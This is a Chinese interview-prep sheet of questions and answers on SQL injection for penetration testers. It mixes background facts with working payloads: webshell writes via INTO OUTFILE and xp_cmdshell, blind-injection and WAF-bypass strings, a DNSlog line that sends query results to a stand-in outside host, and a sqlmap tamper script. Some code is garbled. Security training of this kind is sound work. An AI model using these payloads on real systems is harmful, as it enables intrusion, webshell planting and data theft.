一、知识储备类
1.SQL与NoSQL的区别?
SQL:关系型数据库
NoSQL:非关系型数据库
存储方式:SQL具有特定的结构表,NoSQL存储方式灵活
性能:NoSQL较优于SQL
数据类型:SQL适用结构化数据,如账号密码;NoSQL适用非结构化数据,如文章、评论
2.常见的关系型数据库?
mysql、sqlserver、oracle、access、sqlite、postgreSQL
3.常见的数据库端口?
关系型:
mysql:3306
sqlserver:1433
orecal:1521
PostgreSQL:5432
db2:50000
非关系型:
MongoDB:27017
redis:6379
memcached:11211
4.简述数据库的存储引擎
数据库存储引擎是数据库底层软件组织,数据库管理系统(DBMS)使用数据引擎进行创建、查询、更新和删除数据。不同的存储引擎提供不同的存储机制、索引技巧、锁定水平等功能,使用不同的存储引擎,还可以获得特定的功能。
InnoDB:主流的存储引擎,mysql默认存储引擎
MyISAM:查询、插入速度快,不支持事务
MEMORY:hash索引、BTREE索引
5.SQL注入有哪几种注入类型?
从注入参数类型分:数字型注入、字符型注入、搜索型注入
从注入方法分:基于报错、基于布尔盲注、基于时间盲注、联合查询、堆叠注入、内联查询注入、宽字节注入
从提交方式分:GET注入、POST注入、COOKIE注入、HTTP头注入
6.SQL注入的危害及防御?
危害:
数据库泄露
数据库被破坏
网站崩溃
服务器被植入木马
防御:
代码层面对查询参数进行转义
预编译与参数绑定
利用WAF防御
7.如果存在SQL注入怎么判断不同的数据库?
根据报错信息判断
根据执行函数返回的结果判断,如len()和lenth(),version()和@@version等
根据注释符判断
8.mysql的网站注入,5.0以上和5.0以下有什么区别?
从sql注入的角度来说,mysql5.0以下版本没有information_schema这个系统库,无法列出表名列名,只能暴力跑
9.Mysql一个@和两个@什么区别
一个@是用户自定义变量
两个@是系统变量,如@@version、@@user
10.MYSQL注入/绕过常用的函数
注入常用函数:
database() 返回当前数据库名
user() 返回当前数据库用户名
updatexml() 更新xml文档,常用于报错注入
mid() 从指定字段中提取出字段的内容
limit() 返回结果中的前几条数据或者中间的数据
concat() 返回参数产生的字符串
group_concat() 分组拼接函数
count() 返回指定参数的数目
rand() 参数0~1个随机数
flood() 向下取整
substr() 截取字符串
ascii() 返回字符串的ascii码
left() 返回字符串最左边指定个数的字符
ord() 返回字符的ascii码
length() 返回字符串长度
sleep() 延时函数
等价函数绕过,反之亦可:
group_concat() ==> concat_ws()
sleep() ==> benchmark()
mid()、substr() ==> substring()
user() ==> @@user
updatexml() ==> extractvalue()
11.UDF提权原理?
mysql支持用户自定义函数,将含有自定义函数的dll放入特定的文件夹,声明引入dll中的执行函数,使用执行函数执行系统命令
12.MSSQL差异备份原理及条件?
原理:
完整备份后,再次对数据库进行修改,差异备份会记录最后的LSN,将shell写入数据库,备份成asp即可getshell
条件:
MSSQL具有dbo或sa权限
支持堆叠查询
找到网站的绝对路径
二、实操技能类
1.SQL注入写shell的条件,用法
条件:
当前用户具有dba权限
找到网站绝对路径
网站有可写目录
mysql的配置secure_file_priv为空
用法: mysql:
id=1’ and 1=2 union select 1,2,‘shell内容’ into outfile “绝对路径\shell.php” %23
sqlserver:
id=1’;EXEC master…xp_cmdshell ‘echo “shell内容” > 绝对路径\shell.asp’ –
2.sql注入过滤了逗号,怎么弄?
join绕过:
union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),’ ‘,database(),’ ',@@datadir))D);
3.sleep被禁用后还能怎么进行sql注入
benchmark代替sleep:
id=1 and if(ascii(substring((database()),1,1))=115,(select benchmark(10000000,md5(0x41))),1) --+
笛卡尔积盲注:
select * from ctf_test where user=‘1’ and 1=1 and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C)
RLIKE盲注:
select * from flag where flag=‘1’ and if(mid(user(),1,1)=‘r’,concat(rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’),rpad(1,999999,‘a’)) RLIKE ‘(a.)+(a.)+(a.)+(a.)+(a.)+(a.)+(a.*)+cd’,1)
4.什么是宽字节注入?如何操作?
宽字节注入:
当php开启gpc或者使用addslashes函数时,单引号'被加上反斜杠\',其中\的URL编码为%5C,我们传入%df',等价于%df%5C',此时若程序的默认字符集是GBK,mysql用GBK编码时会认为%df%5C是一个宽字符縗,于是%df%5C'便等价于縗',产生注入。
操作:
id=1%df’ and 1=2 union select 1,2,user(),4 %23
5.怎样进行盲注速度更快?
DNSlog盲注:
id=1’ and load_file(concat(‘\\’,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 1,1),‘.your-dnslog.com\cHr1s’))–+
6.什么是二次注入?
参数传入的恶意数据在传入时被转义,但是在数据库处理时又被还原并存储在数据库中,导致二次注入。
举例:
注册用户名admin'#用户,传入值为admin\'#,但是在存储数据库时值变为admin'#,此时若修改密码为123456,管理员admin密码就被修改为123456
7.sql注入常见的过WAF方法?
内联注释绕过
填充大量脏数据绕过
垃圾参数填充绕过
改变提交方式绕过,如GET方式变为POST方式提交
随机agent头绕过
fuzz过滤函数,函数替换绕过
8.sqlmap如何编写tamper?
tamper固定模板如下:
from lib.core.enums import PRIORITY
priority = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
pass
PROIORITY
用于定义tamper优先级,当调用多个tamper时生效,优先级如下,数值越大优先级越高
LOWEST = -100
LOWER = -50
LOW = -10
NORMAL = 0
HIGH = 10
HIGHER = 50
HIGHEST = 100
dependencies
用于提示用户tamper适用范围,具体代码如下:
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
import os
priority = PRIORITY.LOW
def dependencies():
singleTimeWarnMessage(“过狗tamper ‘%s’ 只针对 %s” % (os.path.basename(file).split(“.”)[0], DBMS.MYSQL))
DBMS.MYSQL代表MYSQL,其他数据库类推
Tamper
tamper关键函数,用于定义过滤规则,示例代码如下:
from lib.core.enums import PRIORITY
priority = PRIORITY.LOW
def tamper(payload, kwargs):
payload=payload.replace(‘AND’,‘/!29440AND/’)
payload=payload.replace(‘ORDER’,‘/!29440order/’)
payload=payload.replace(‘LIKE USER()’,'like (user//())‘)
payload=payload.replace(‘DATABASE()’,‘database/!29440/()’)
payload=payload.replace(‘CURRENT_USER()’,‘CURRENT_USER//()‘)
payload=payload.replace(‘SESSION_USER()’,‘SESSION_USER(%0a)’)
payload=payload.replace(‘UNION ALL SELECT’,‘union/!29440select/’)
payload=payload.replace(‘super_priv’,’/*!29440//super_priv*/’)
payload=payload.replace(‘and host=’,’/!29440and/host/!11440=/')
payload=payload.replace(‘BENCHMARK(’,‘BENCHMARK/!29440/(’)
payload=payload.replace(‘SLEEP(’,‘sleep/**/(’)
return payload
fuzz出具体payload后对关键字符进行替换
将上述过程简单总结来回答hr问题即可